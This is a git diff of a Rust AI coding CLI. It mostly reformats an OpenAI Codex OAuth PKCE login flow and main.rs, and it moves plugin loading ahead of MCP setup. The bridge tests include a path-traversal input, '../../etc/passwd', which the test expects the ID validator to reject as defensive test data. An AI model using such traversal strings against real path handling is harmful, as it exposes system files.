test_device_fingerprint_is_stable() { + let a = device_fingerprint(); + let b = device_fingerprint(); + assert_eq!(a, b, "fingerprint must be deterministic"); + } + + #[test] + fn test_jwt_decode_invalid() { + assert!(JwtClaims::decode("notajwt").is_err()); + let _ = JwtClaims::decode("only.two"); // must not panic + } + + #[test] + fn test_jwt_expired_unparseable() { + // Unparseable token defaults to expired=true + assert!(jwt_is_expired("bad.token.here")); + } + + #[test] + fn test_bridge_config_default_not_active() { + let cfg = BridgeConfig::default(); + assert!(!cfg.is_active(), "default config must not be active"); + } + + #[test] + fn test_bridge_config_with_token_still_needs_enabled() { + let mut cfg = BridgeConfig { + session_token: Some("tok".into()), + ..Default::default() + }; + assert!(!cfg.is_active(), "needs enabled=true too"); + cfg.enabled = true; + assert!(cfg.is_active()); + } + + #[test] + fn test_validate_id_rejects_traversal() { + assert!(BridgeConfig::validate_id("../../etc/passwd", "id").is_err()); + assert!(BridgeConfig::validate_id("abc123", "id").is_ok()); + assert!(BridgeConfig::validate_id("env_abc-123", "id").is_ok()); + assert!(BridgeConfig::validate_id("", "id").is_err()); + } + + #[test] + fn test_permission_decision_serde() { + let d = PermissionDecision::AllowPermanently; + let s = serde_json::to_string(&d).unwrap(); + assert_eq!(s, r#""allow_permanently""#); + let back: PermissionDecision = serde_json::from_str(&s).unwrap(); + assert_eq!(back, d); + } + + #[test] + fn test_bridge_session_state_serde() { + let s = BridgeSessionState::Processing; + let j = serde_json::to_string(&s).unwrap(); + assert_eq!(j, r#""processing""#); + } + + #[test] + fn test_bridge_message_serde_user_message() { + let msg = BridgeMessage::UserMessage { + content: "hello".into(), + session_id: "s1".into(), + message_id: "m1".into(), + attachments: vec![], + }; + let j = serde_json::to_string(&msg).unwrap(); + assert!(j.contains(r#""type":"user_message""#)); + } + + #[test] + fn test_bridge_event_text_delta_serde() { + let ev = BridgeEvent::TextDelta { + text: "hello world".into(), + message_id: "m1".into(), + index: Some(0), + }; + let j = serde_json::to_string(&ev).unwrap(); + assert!(j.contains(r#""type":"text_delta""#)); + assert!(j.contains("hello world")); + } + + #[test] + fn test_bridge_event_pong_serde() { + let ev = BridgeEvent::Pong { + server_time: Some(1_700_000_000), + }; + let j = serde_json::to_string(&ev).unwrap(); + assert!(j.contains(r#""type":"pong""#)); + } +} diff --git a/src-rust/crates/buddy/src/lib.rs b/src-rust/crates/buddy/src/lib.rs index ff31aa6..055fa90 100644 --- a/src-rust/crates/buddy/src/lib.rs +++ b/src-rust/crates/buddy/src/lib.rs @@ -1010,7 +1010,7 @@ mod tests { let mut rng = Mulberry32::new(42); for _ in 0..1000 { let v = rng.next_f64(); - assert!(v >= 0.0 && v < 1.0, "out of range: {v}"); + assert!((0.0..1.0).contains(&v), "out of range: {v}"); } } diff --git a/src-rust/crates/cli/src/codex_oauth_flow.rs b/src-rust/crates/cli/src/codex_oauth_flow.rs index 047eae1..2aa4b2f 100644 --- a/src-rust/crates/cli/src/codex_oauth_flow.rs +++ b/src-rust/crates/cli/src/codex_oauth_flow.rs @@ -1,296 +1,311 @@ -//! OpenAI Codex OAuth 2.0 PKCE flow for Coven Code. -//! -//! Implements authorization code flow with PKCE to obtain OpenAI access -//! tokens for Codex model access. - -#![allow(dead_code)] // OAuth functions are integrated via create_message_codex - -use anyhow::{anyhow, bail}; -use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _}; -use sha2::{Digest, Sha256}; -use tokio::io::{AsyncBufReadExt, BufReader}; -use tokio::net::TcpListener; -use tokio::sync::mpsc; -use claurst_core::oauth_config::CodexTokens; -use claurst_core::codex_oauth::{CODEX_CLIENT_ID, CODEX_AUTHORIZE_URL, CODEX_OAUTH_PORT, CODEX_REDIRECT_URI, CODEX_SCOPES, CODEX_TOKEN_URL}; -use claurst_tui::DeviceAuthEvent; - -/// Generate a PKCE code verifier (random 64-byte base64url string). -pub fn generate_code_verifier() -> String { - let mut bytes = [0u8; 48]; - // Use UUID v4 for randomness (reuse the approach from oauth_config.rs) - let u1 = uuid::Uuid::new_v4(); - let u2 = uuid::Uuid::new_v4(); - bytes[..16].copy_from_slice(u1.as_bytes()); - bytes[16..32].copy_from_slice(u2.as_bytes()); - // For remaining bytes, use UUID truncation - let u3 = uuid::Uuid::new_v4(); - bytes[32..48].copy_from_slice(&u3.as_bytes()[..16]); - - URL_SAFE_NO_PAD.encode(&bytes) -} - -/// Compute PKCE code challenge (SHA-256 of verifier, base64url encoded). -pub fn compute_code_challenge(verifier: &str) -> String { - let hash = Sha256::digest(verifier.as_bytes()); - URL_SAFE_NO_PAD.encode(hash) -} - -/// Generate a random OAuth state parameter. -pub fn generate_state() -> String { - let bytes = uuid::Uuid::new_v4(); - URL_SAFE_NO_PAD.encode(bytes.as_bytes()) - .chars() - .take(32) - .collect() -} - -/// Build the OpenAI authorization URL for Codex OAuth. -pub fn build_auth_url(code_challenge: &str, state: &str) -> String { - format!( - "{}?response_type=code&client_id={}&redirect_uri={}&scope={}&code_challenge={}&code_challenge_method=S256&state={}&id_token_add_organizations=true&codex_cli_simplified_flow=true&originator=coven-code", - CODEX_AUTHORIZE_URL, - CODEX_CLIENT_ID, - urlencoding::encode(CODEX_REDIRECT_URI), - urlencoding::encode(CODEX_SCOPES), - code_challenge, - state, - ) -} - -/// Start local HTTP server on port 1455, open browser, wait for callback, -/// exchange code for tokens, return CodexTokens. -/// -/// `event_tx` is used to send the OAuth URL back to the TUI dialog so it can -/// display it (and copy it to the clipboard) in case the automatic browser -/// launch fails. -pub async fn run_oauth_flow(event_tx: mpsc::Sender) -> anyhow::Result { - run_oauth_flow_with_label(event_tx, None).await -} - -/// Same as [`run_oauth_flow`] but lets the caller supply a label for the -/// newly registered profile. -pub async fn run_oauth_flow_with_label( - event_tx: mpsc::Sender, - label: Option<&str>, -) -> anyhow::Result { - let verifier = generate_code_verifier(); - let challenge = compute_code_challenge(&verifier); - let state = generate_state(); - - // Bind local server for callback - let listener = TcpListener::bind(format!("127.0.0.1:{}", CODEX_OAUTH_PORT)) - .await - .map_err(|e| anyhow!("Failed to bind port {}: {}", CODEX_OAUTH_PORT, e))?; - - let auth_url = build_auth_url(&challenge, &state); - - // Send the URL to the TUI so it can display + clipboard-copy it. - let _ = event_tx.send(DeviceAuthEvent::GotBrowserUrl { url: auth_url.clone() }).await; - - // Also try to open the browser (best-effort; may silently fail in headless envs). - let _ = open::that(&auth_url); - - // Wait for OAuth callback - let (code, callback_state) = wait_for_callback(listener).await?; - - if callback_state != state { - bail!("OAuth state mismatch — possible CSRF attack"); - } - - // Exchange code for tokens - let tokens = exchange_code_for_tokens(&code, &verifier).await?; - - // Persist tokens and register an account profile in the registry. - claurst_core::oauth_config::save_codex_tokens_and_register(&tokens, label)?; - - eprintln!("Codex login successful!"); - Ok(tokens) -} - -/// Wait for OAuth callback on local server, extract code and state. -async fn wait_for_callback(listener: TcpListener) -> anyhow::Result<(String, String)> { - use tokio::io::AsyncWriteExt; - - let (mut socket, _) = tokio::time::timeout( - std::time::Duration::from_secs(300), // 5 minute timeout - listener.accept(), - ) - .await - .map_err(|_| anyhow!("OAuth callback timeout (5 minutes)"))? - .map_err(|e| anyhow!("Failed to accept connection: {}", e))?; - - let mut reader = BufReader::new(&mut socket); - let mut request_line = String::new(); - reader.read_line(&mut request_line).await?; - - // Parse "GET /auth/callback?code=...&state=... HTTP/1.1" - let parts: Vec<&str> = request_line.split_whitespace().collect(); - if parts.len() < 2 { - bail!("Invalid HTTP request"); - } - - let path = parts[1]; - let query_start = path.find('?').ok_or_else(|| anyhow!("No query string in callback"))?; - let query = &path[query_start + 1..]; - - let mut code = String::new(); - let mut state = String::new(); - let mut error = String::new(); - - for param in query.split('&') { - let kv: Vec<&str> = param.splitn(2, '=').collect(); - if kv.len() == 2 { - match kv[0] { - "code" => code = urlencoding::decode(kv[1])?.to_string(), - "state" => state = urlencoding::decode(kv[1])?.to_string(), - "error" => error = urlencoding::decode(kv[1])?.to_string(), - "error_description" => error = urlencoding::decode(kv[1])?.to_string(), - _ => {} - } - } - } - - // Send HTML response to browser before processing - let html = if error.is_empty() { - "\ -

Authorization Successful

You can close this window and return to Coven Code.

\ - " - } else { - "\ -

Authorization Failed

Check the terminal for details.

" - }; - let response = format!( - "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{}", - html.len(), - html - ); - // Drop the BufReader so we can write back on the socket - drop(reader); - let _ = socket.write_all(response.as_bytes()).await; - let _ = socket.shutdown().await; - - if !error.is_empty() { - bail!("OAuth error: {}", error); - } - - if code.is_empty() || state.is_empty() { - bail!("Missing code or state in OAuth callback"); - } - - Ok((code, state)) -} - -/// Exchange authorization code for access tokens. -async fn exchange_code_for_tokens(code: &str, verifier: &str) -> anyhow::Result { - let client = reqwest::Client::new(); - let params = [ - ("client_id", CODEX_CLIENT_ID), - ("code", code), - ("code_verifier", verifier), - ("grant_type", "authorization_code"), - ("redirect_uri", CODEX_REDIRECT_URI), - ]; - - let resp = client - .post(CODEX_TOKEN_URL) - .form(¶ms) - .send() - .await - .map_err(|e| anyhow!("Failed to exchange code: {}", e))?; - - if !resp.status().is_success() { - let status = resp.status(); - let body = resp.text().await.unwrap_or_default(); - bail!("Token exchange failed ({}): {}", status, body); - } - - let body: serde_json::Value = resp - .json() - .await - .map_err(|e| anyhow!("Failed to parse token response: {}", e))?; - - let access_token = body["access_token"] - .as_str() - .unwrap_or("") - .to_string(); - - if access_token.is_empty() { - bail!("No access_token in response"); - } - - let refresh_token = body["refresh_token"].as_str().map(|s| s.to_string()); - let account_id = extract_account_id_from_jwt(&access_token); - - Ok(CodexTokens { - access_token, - refresh_token, - account_id, - expires_at: None, - }) -} - -/// Extract chatgpt-account-id from the JWT access token. -/// The account_id is in the middle segment (payload) under -/// https://api.openai.com/auth.account_id -fn extract_account_id_from_jwt(token: &str) -> Option { - let parts: Vec<&str> = token.splitn(3, '.').collect(); - let payload_b64 = parts.get(1)?; - let payload = URL_SAFE_NO_PAD.decode(payload_b64).ok()?; - let json: serde_json::Value = serde_json::from_slice(&payload).ok()?; - json["https://api.openai.com/auth"]["account_id"] - .as_str() - .map(|s| s.to_string()) -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_generate_code_verifier_format() { - let verifier = generate_code_verifier(); - // Base64url encoding: [A-Za-z0-9_-] - assert!(verifier.chars().all(|c| c.is_alphanumeric() || c == '_' || c == '-')); - assert!(!verifier.is_empty()); - } - - #[test] - fn test_compute_code_challenge_consistency() { - let verifier = "test_verifier_string"; - let challenge1 = compute_code_challenge(verifier); - let challenge2 = compute_code_challenge(verifier); - assert_eq!(challenge1, challenge2); - // Base64url format - assert!(challenge1.chars().all(|c| c.is_alphanumeric() || c == '_' || c == '-')); - } - - #[test] - fn test_generate_state_format() { - let state = generate_state(); - assert!(!state.is_empty()); - assert!(state.chars().all(|c| c.is_alphanumeric() || c == '_' || c == '-')); - } - - #[test] - fn test_build_auth_url_contains_required_params() { - let url = build_auth_url("challenge123", "state456"); - assert!(url.contains("client_id=")); - assert!(url.contains("challenge123")); - assert!(url.contains("state456")); - assert!(url.contains("S256")); - assert!(url.contains("response_type=code")); - } - - #[test] - fn test_extract_account_id_from_valid_jwt() { - // This is a test JWT (not real credentials) with account_id in it - // Format: header.payload.signature - // For testing we'd need to create a valid JWT structure, which is complex - // In practice, this function is tested via integration tests - let invalid_token = "not.a.jwt"; - let result = extract_account_id_from_jwt(invalid_token); - // Invalid JWT should return None - assert!(result.is_none() || result.unwrap().is_empty()); - } -} +//! OpenAI Codex OAuth 2.0 PKCE flow for Coven Code. +//! +//! Implements authorization code flow with PKCE to obtain OpenAI access +//! tokens for Codex model access. + +#![allow(dead_code)] // OAuth functions are integrated via create_message_codex + +use anyhow::{anyhow, bail}; +use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _}; +use claurst_core::codex_oauth::{ + CODEX_AUTHORIZE_URL, CODEX_CLIENT_ID, CODEX_OAUTH_PORT, CODEX_REDIRECT_URI, CODEX_SCOPES, + CODEX_TOKEN_URL, +}; +use claurst_core::oauth_config::CodexTokens; +use claurst_tui::DeviceAuthEvent; +use sha2::{Digest, Sha256}; +use tokio::io::{AsyncBufReadExt, BufReader}; +use tokio::net::TcpListener; +use tokio::sync::mpsc; + +/// Generate a PKCE code verifier (random 64-byte base64url string). +pub fn generate_code_verifier() -> String { + let mut bytes = [0u8; 48]; + // Use UUID v4 for randomness (reuse the approach from oauth_config.rs) + let u1 = uuid::Uuid::new_v4(); + let u2 = uuid::Uuid::new_v4(); + bytes[..16].copy_from_slice(u1.as_bytes()); + bytes[16..32].copy_from_slice(u2.as_bytes()); + // For remaining bytes, use UUID truncation + let u3 = uuid::Uuid::new_v4(); + bytes[32..48].copy_from_slice(&u3.as_bytes()[..16]); + + URL_SAFE_NO_PAD.encode(bytes) +} + +/// Compute PKCE code challenge (SHA-256 of verifier, base64url encoded). +pub fn compute_code_challenge(verifier: &str) -> String { + let hash = Sha256::digest(verifier.as_bytes()); + URL_SAFE_NO_PAD.encode(hash) +} + +/// Generate a random OAuth state parameter. +pub fn generate_state() -> String { + let bytes = uuid::Uuid::new_v4(); + URL_SAFE_NO_PAD + .encode(bytes.as_bytes()) + .chars() + .take(32) + .collect() +} + +/// Build the OpenAI authorization URL for Codex OAuth. +pub fn build_auth_url(code_challenge: &str, state: &str) -> String { + format!( + "{}?response_type=code&client_id={}&redirect_uri={}&scope={}&code_challenge={}&code_challenge_method=S256&state={}&id_token_add_organizations=true&codex_cli_simplified_flow=true&originator=coven-code", + CODEX_AUTHORIZE_URL, + CODEX_CLIENT_ID, + urlencoding::encode(CODEX_REDIRECT_URI), + urlencoding::encode(CODEX_SCOPES), + code_challenge, + state, + ) +} + +/// Start local HTTP server on port 1455, open browser, wait for callback, +/// exchange code for tokens, return CodexTokens. +/// +/// `event_tx` is used to send the OAuth URL back to the TUI dialog so it can +/// display it (and copy it to the clipboard) in case the automatic browser +/// launch fails. +pub async fn run_oauth_flow( + event_tx: mpsc::Sender, +) -> anyhow::Result { + run_oauth_flow_with_label(event_tx, None).await +} + +/// Same as [`run_oauth_flow`] but lets the caller supply a label for the +/// newly registered profile. +pub async fn run_oauth_flow_with_label( + event_tx: mpsc::Sender, + label: Option<&str>, +) -> anyhow::Result { + let verifier = generate_code_verifier(); + let challenge = compute_code_challenge(&verifier); + let state = generate_state(); + + // Bind local server for callback + let listener = TcpListener::bind(format!("127.0.0.1:{}", CODEX_OAUTH_PORT)) + .await + .map_err(|e| anyhow!("Failed to bind port {}: {}", CODEX_OAUTH_PORT, e))?; + + let auth_url = build_auth_url(&challenge, &state); + + // Send the URL to the TUI so it can display + clipboard-copy it. + let _ = event_tx + .send(DeviceAuthEvent::GotBrowserUrl { + url: auth_url.clone(), + }) + .await; + + // Also try to open the browser (best-effort; may silently fail in headless envs). + let _ = open::that(&auth_url); + + // Wait for OAuth callback + let (code, callback_state) = wait_for_callback(listener).await?; + + if callback_state != state { + bail!("OAuth state mismatch — possible CSRF attack"); + } + + // Exchange code for tokens + let tokens = exchange_code_for_tokens(&code, &verifier).await?; + + // Persist tokens and register an account profile in the registry. + claurst_core::oauth_config::save_codex_tokens_and_register(&tokens, label)?; + + eprintln!("Codex login successful!"); + Ok(tokens) +} + +/// Wait for OAuth callback on local server, extract code and state. +async fn wait_for_callback(listener: TcpListener) -> anyhow::Result<(String, String)> { + use tokio::io::AsyncWriteExt; + + let (mut socket, _) = tokio::time::timeout( + std::time::Duration::from_secs(300), // 5 minute timeout + listener.accept(), + ) + .await + .map_err(|_| anyhow!("OAuth callback timeout (5 minutes)"))? + .map_err(|e| anyhow!("Failed to accept connection: {}", e))?; + + let mut reader = BufReader::new(&mut socket); + let mut request_line = String::new(); + reader.read_line(&mut request_line).await?; + + // Parse "GET /auth/callback?code=...&state=... HTTP/1.1" + let parts: Vec<&str> = request_line.split_whitespace().collect(); + if parts.len() < 2 { + bail!("Invalid HTTP request"); + } + + let path = parts[1]; + let query_start = path + .find('?') + .ok_or_else(|| anyhow!("No query string in callback"))?; + let query = &path[query_start + 1..]; + + let mut code = String::new(); + let mut state = String::new(); + let mut error = String::new(); + + for param in query.split('&') { + let kv: Vec<&str> = param.splitn(2, '=').collect(); + if kv.len() == 2 { + match kv[0] { + "code" => code = urlencoding::decode(kv[1])?.to_string(), + "state" => state = urlencoding::decode(kv[1])?.to_string(), + "error" => error = urlencoding::decode(kv[1])?.to_string(), + "error_description" => error = urlencoding::decode(kv[1])?.to_string(), + _ => {} + } + } + } + + // Send HTML response to browser before processing + let html = if error.is_empty() { + "\ +

Authorization Successful

You can close this window and return to Coven Code.

\ + " + } else { + "\ +

Authorization Failed

Check the terminal for details.

" + }; + let response = format!( + "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{}", + html.len(), + html + ); + // Drop the BufReader so we can write back on the socket + drop(reader); + let _ = socket.write_all(response.as_bytes()).await; + let _ = socket.shutdown().await; + + if !error.is_empty() { + bail!("OAuth error: {}", error); + } + + if code.is_empty() || state.is_empty() { + bail!("Missing code or state in OAuth callback"); + } + + Ok((code, state)) +} + +/// Exchange authorization code for access tokens. +async fn exchange_code_for_tokens(code: &str, verifier: &str) -> anyhow::Result { + let client = reqwest::Client::new(); + let params = [ + ("client_id", CODEX_CLIENT_ID), + ("code", code), + ("code_verifier", verifier), + ("grant_type", "authorization_code"), + ("redirect_uri", CODEX_REDIRECT_URI), + ]; + + let resp = client + .post(CODEX_TOKEN_URL) + .form(¶ms) + .send() + .await + .map_err(|e| anyhow!("Failed to exchange code: {}", e))?; + + if !resp.status().is_success() { + let status = resp.status(); + let body = resp.text().await.unwrap_or_default(); + bail!("Token exchange failed ({}): {}", status, body); + } + + let body: serde_json::Value = resp + .json() + .await + .map_err(|e| anyhow!("Failed to parse token response: {}", e))?; + + let access_token = body["access_token"].as_str().unwrap_or("").to_string(); + + if access_token.is_empty() { + bail!("No access_token in response"); + } + + let refresh_token = body["refresh_token"].as_str().map(|s| s.to_string()); + let account_id = extract_account_id_from_jwt(&access_token); + + Ok(CodexTokens { + access_token, + refresh_token, + account_id, + expires_at: None, + }) +} + +/// Extract chatgpt-account-id from the JWT access token. +/// The account_id is in the middle segment (payload) under +/// https://api.openai.com/auth.account_id +fn extract_account_id_from_jwt(token: &str) -> Option { + let parts: Vec<&str> = token.splitn(3, '.').collect(); + let payload_b64 = parts.get(1)?; + let payload = URL_SAFE_NO_PAD.decode(payload_b64).ok()?; + let json: serde_json::Value = serde_json::from_slice(&payload).ok()?; + json["https://api.openai.com/auth"]["account_id"] + .as_str() + .map(|s| s.to_string()) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_generate_code_verifier_format() { + let verifier = generate_code_verifier(); + // Base64url encoding: [A-Za-z0-9_-] + assert!(verifier + .chars() + .all(|c| c.is_alphanumeric() || c == '_' || c == '-')); + assert!(!verifier.is_empty()); + } + + #[test] + fn test_compute_code_challenge_consistency() { + let verifier = "test_verifier_string"; + let challenge1 = compute_code_challenge(verifier); + let challenge2 = compute_code_challenge(verifier); + assert_eq!(challenge1, challenge2); + // Base64url format + assert!(challenge1 + .chars() + .all(|c| c.is_alphanumeric() || c == '_' || c == '-')); + } + + #[test] + fn test_generate_state_format() { + let state = generate_state(); + assert!(!state.is_empty()); + assert!(state + .chars() + .all(|c| c.is_alphanumeric() || c == '_' || c == '-')); + } + + #[test] + fn test_build_auth_url_contains_required_params() { + let url = build_auth_url("challenge123", "state456"); + assert!(url.contains("client_id=")); + assert!(url.contains("challenge123")); + assert!(url.contains("state456")); + assert!(url.contains("S256")); + assert!(url.contains("response_type=code")); + } + + #[test] + fn test_extract_account_id_from_valid_jwt() { + // This is a test JWT (not real credentials) with account_id in it + // Format: header.payload.signature + // For testing we'd need to create a valid JWT structure, which is complex + // In practice, this function is tested via integration tests + let invalid_token = "not.a.jwt"; + let result = extract_account_id_from_jwt(invalid_token); + // Invalid JWT should return None + assert!(result.is_none() || result.unwrap().is_empty()); + } +} diff --git a/src-rust/crates/cli/src/main.rs b/src-rust/crates/cli/src/main.rs index 044c904..02ae7d8 100644 --- a/src-rust/crates/cli/src/main.rs +++ b/src-rust/crates/cli/src/main.rs @@ -8,8 +8,8 @@ // - Headless (--print / -p) mode: single query, output to stdout // - Interactive REPL mode: full TUI with ratatui -mod oauth_flow; mod codex_oauth_flow; +mod oauth_flow; mod upgrade; // --------------------------------------------------------------------------- @@ -32,6 +32,9 @@ pub const FEEDBACK_CHANNEL: &str = env!("FEEDBACK_CHANNEL"); pub const ISSUES_EXPLAINER: &str = env!("ISSUES_EXPLAINER"); use anyhow::Context; +use async_trait::async_trait; +use clap::{ArgAction, Parser, ValueEnum}; +use claurst_core::types::ToolDefinition; use claurst_core::{ config::{Config, PermissionMode, Settings}, constants::APP_VERSION, @@ -39,10 +42,7 @@ use claurst_core::{ cost::CostTracker, permissions::{AutoPermissionHandler, InteractivePermissionHandler, PermissionManager}, }; -use async_trait::async_trait; -use claurst_core::types::ToolDefinition; use claurst_tools::{PermissionLevel, Tool, ToolContext, ToolResult}; -use clap::{ArgAction, Parser, ValueEnum}; use parking_lot::Mutex as ParkingMutex; use std::{path::PathBuf, sync::Arc}; use tracing::{debug, info, warn}; @@ -340,8 +340,15 @@ fn resolve_bridge_config( bridge_config.is_active().then_some(bridge_config) } -fn handle_exit_key(app: &mut claurst_tui::app::App, key: crossterm::event::KeyEvent, cancel: &Option) -> bool { - if !key.modifiers.contains(crossterm::event::KeyModifiers::CONTROL) { +fn handle_exit_key( + app: &mut claurst_tui::app::App, + key: crossterm::event::KeyEvent, + cancel: &Option, +) -> bool { + if !key + .modifiers + .contains(crossterm::event::KeyModifiers::CONTROL) + { return false; } @@ -411,7 +418,8 @@ async fn main() -> anyhow::Result<()> { if let Some(cmd_name) = raw_args.get(1).map(|s| s.as_str()) { // Only intercept if it looks like a subcommand (no leading `-` or `/`) if !cmd_name.starts_with('-') && !cmd_name.starts_with('/') { - if let Some(named_cmd) = claurst_commands::named_commands::find_named_command(cmd_name) { + if let Some(named_cmd) = claurst_commands::named_commands::find_named_command(cmd_name) + { // Build a minimal CommandContext (named commands are pre-session) let settings = Settings::load().await.unwrap_or_default(); let config = settings.effective_config(); @@ -454,12 +462,20 @@ async fn main() -> anyhow::Result<()> { // Setup logging let log_level = if cli.verbose { "debug" } else { "warn" }; - let base_filter = EnvFilter::try_from_default_env() - .unwrap_or_else(|_| EnvFilter::new(log_level)); + let base_filter = + EnvFilter::try_from_default_env().unwrap_or_else(|_| EnvFilter::new(log_level)); let log_filter = base_filter - .add_directive("rmcp::service::client=error".parse().expect("valid rmcp directive")) + .add_directive( + "rmcp::service::client=error" + .parse() + .expect("valid rmcp directive"), + ) // Suppress error/warn logs from providers and query — errors are already shown as error modals - .add_directive("claurst_api::providers::free=off".parse().expect("valid directive")) + .add_directive( + "claurst_api::providers::free=off" + .parse() + .expect("valid directive"), + ) .add_directive("claurst_query=off".parse().expect("valid directive")); tracing_subscriber::fmt() .with_env_filter(log_filter) @@ -523,7 +539,10 @@ async fn main() -> anyhow::Result<()> { } if let Some(base) = &cli.api_base { // Store in the provider's config entry - let provider_id = config.provider.clone().unwrap_or_else(|| "anthropic".to_string()); + let provider_id = config + .provider + .clone() + .unwrap_or_else(|| "anthropic".to_string()); config .provider_configs .entry(provider_id) @@ -533,8 +552,7 @@ async fn main() -> anyhow::Result<()> { // --dump-system-prompt fast path if cli.dump_system_prompt { - let ctx = ContextBuilder::new(cwd.clone()) - .disable_claude_mds(config.disable_claude_mds); + let ctx = ContextBuilder::new(cwd.clone()).disable_claude_mds(config.disable_claude_mds); let sys = ctx.build_system_context().await; let user = ctx.build_user_context().await; println!("{}\n\n{}", sys, user); @@ -542,8 +560,8 @@ async fn main() -> anyhow::Result<()> { } // Build context - let ctx_builder = ContextBuilder::new(cwd.clone()) - .disable_claude_mds(config.disable_claude_mds); + let ctx_builder = + ContextBuilder::new(cwd.clone()).disable_claude_mds(config.disable_claude_mds); let system_ctx = ctx_builder.build_system_context().await; let user_ctx = ctx_builder.build_user_context().await; @@ -628,9 +646,13 @@ async fn main() -> anyhow::Result<()> { ))); let permission_handler: Arc = if is_headless { - Arc::new(AutoPermissionHandler::with_manager(permission_manager.clone())) + Arc::new(AutoPermissionHandler::with_manager( + permission_manager.clone(), + )) } else { - Arc::new(InteractivePermissionHandler::with_manager(permission_manager.clone())) + Arc::new(InteractivePermissionHandler::with_manager( + permission_manager.clone(), + )) }; let cost_tracker = CostTracker::new(); // Use --session-id if provided, otherwise generate a fresh UUID. @@ -643,10 +665,38 @@ async fn main() -> anyhow::Result<()> { )); let current_turn = Arc::new(std::sync::atomic::AtomicUsize::new(0)); - // Initialize MCP servers first (needed for ToolContext.mcp_manager). + // Load plugins before MCP so plugin-provided servers join the initial + // connection/tool-wrapper pass. + let plugin_registry = claurst_plugins::load_plugins(&cwd, &[]).await; + { + let plugin_cmd_count = plugin_registry.all_command_defs().len(); + let hook_registry = plugin_registry.build_hook_registry(); + let plugin_hook_count = hook_registry.values().map(|v| v.len()).sum::(); + info!( + plugins = plugin_registry.enabled_count(), + commands = plugin_cmd_count, + hooks = plugin_hook_count, + "Plugins loaded" + ); + + let mut existing_names: std::collections::HashSet = + config.mcp_servers.iter().map(|s| s.name.clone()).collect(); + for mcp_server in plugin_registry.all_mcp_servers() { + if existing_names.insert(mcp_server.name.clone()) { + config.mcp_servers.push(mcp_server); + } + } + + claurst_plugins::set_global_hooks(hook_registry); + claurst_plugins::set_global_registry(plugin_registry); + } + + // Initialize MCP servers after plugin MCP definitions are merged. let mcp_manager_arc = connect_mcp_manager_arc(&config).await; - let pending_permissions = Arc::new(ParkingMutex::new(claurst_tools::PendingPermissionStore::default())); + let pending_permissions = Arc::new(ParkingMutex::new( + claurst_tools::PendingPermissionStore::default(), + )); let is_non_interactive = cli.print || cli.prompt.is_some(); @@ -654,7 +704,11 @@ async fn main() -> anyhow::Result<()> { // Only created in interactive mode; None in headless/print mode. let (user_question_tx, user_question_rx) = tokio::sync::mpsc::unbounded_channel::(); - let user_question_rx = if is_non_interactive { None } else { Some(user_question_rx) }; + let user_question_rx = if is_non_interactive { + None + } else { + Some(user_question_rx) + }; let tool_ctx = ToolContext { working_dir: cwd.clone(), @@ -671,7 +725,11 @@ async fn main() -> anyhow::Result<()> { completion_notifier: None, pending_permissions: Some(pending_permissions.clone()), permission_manager: Some(permission_manager.clone()), - user_question_tx: if is_non_interactive { None } else { Some(user_question_tx) }, + user_question_tx: if is_non_interactive { + None + } else { + Some(user_question_tx) + }, }; // Hourly shadow-snapshot GC loop: only runs when snapshot is explicitly enabled. @@ -694,7 +752,7 @@ async fn main() -> anyhow::Result<()> { // but we guard with a std::sync::OnceLock internally). { static SWARM_INIT: std::sync::OnceLock<()> = std::sync::OnceLock::new(); - SWARM_INIT.get_or_init(|| claurst_query::init_team_swarm_runner()); + SWARM_INIT.get_or_init(claurst_query::init_team_swarm_runner); } // Build the full tool list: built-ins from cc-tools plus AgentTool from cc-query @@ -702,44 +760,14 @@ async fn main() -> anyhow::Result<()> { // Wrap in Arc so the list can be shared by the main loop AND the cron scheduler. let tools = build_tools_with_mcp(mcp_manager_arc.clone()); - // Load plugins and register any plugin-provided MCP servers into the - // in-memory config (does not modify the settings file on disk). - let plugin_registry = claurst_plugins::load_plugins(&cwd, &[]).await; - { - let plugin_cmd_count = plugin_registry.all_command_defs().len(); - let plugin_hook_count = plugin_registry - .build_hook_registry() - .values() - .map(|v| v.len()) - .sum::(); - info!( - plugins = plugin_registry.enabled_count(), - commands = plugin_cmd_count, - hooks = plugin_hook_count, - "Plugins loaded" - ); - - // Register plugin MCP servers into the in-memory config so they are - // picked up by any subsequent MCP manager construction. - let existing_names: std::collections::HashSet = config - .mcp_servers - .iter() - .map(|s| s.name.clone()) - .collect(); - for mcp_server in plugin_registry.all_mcp_servers() { - if !existing_names.contains(&mcp_server.name) { - config.mcp_servers.push(mcp_server); - } - } - } - // Build model registry for dynamic model/provider resolution. // The registry is pre-populated with a hardcoded snapshot and enriched // from the models.dev cache if available. let model_registry = load_cached_model_registry(); // Build query config - let mut query_config = claurst_query::QueryConfig::from_config_with_registry(&config, &model_registry); + let mut query_config = + claurst_query::QueryConfig::from_config_with_registry(&config, &model_registry); query_config.model_registry = Some(model_registry.clone()); query_config.max_turns = cli.max_turns; query_config.system_prompt = Some(system_prompt); @@ -749,10 +777,13 @@ async fn main() -> anyhow::Result<()> { query_config.thinking_budget = Some(tokens); } if let Some(ref level_str) = cli.effort { - if let Some(level) = claurst_core::effort::EffortLevel::from_str(level_str) { + if let Some(level) = claurst_core::effort::EffortLevel::parse(level_str) { query_config.effort_level = Some(level); } else { - eprintln!("Warning: unknown effort level '{}' — expected low/medium/high/max", level_str); + eprintln!( + "Warning: unknown effort level '{}' — expected low/medium/high/max", + level_str + ); } } if let Some(usd) = cli.max_budget_usd { @@ -781,7 +812,10 @@ async fn main() -> anyhow::Result<()> { } filter_tools_for_agent(tools, &access) } else { - eprintln!("Warning: unknown agent '{}'. Run /agent to see available agents.", agent_name); + eprintln!( + "Warning: unknown agent '{}'. Run /agent to see available agents.", + agent_name + ); tools } } else { @@ -801,15 +835,7 @@ async fn main() -> anyhow::Result<()> { // --print mode (headless) let result = if is_headless { - run_headless( - &cli, - client, - tools, - tool_ctx, - query_config, - cost_tracker, - ) - .await + run_headless(&cli, client, tools, tool_ctx, query_config, cost_tracker).await } else { let auth_store = claurst_core::AuthStore::load(); let has_saved_credentials = !auth_store.credentials.is_empty() @@ -838,14 +864,15 @@ async fn main() -> anyhow::Result<()> { result } 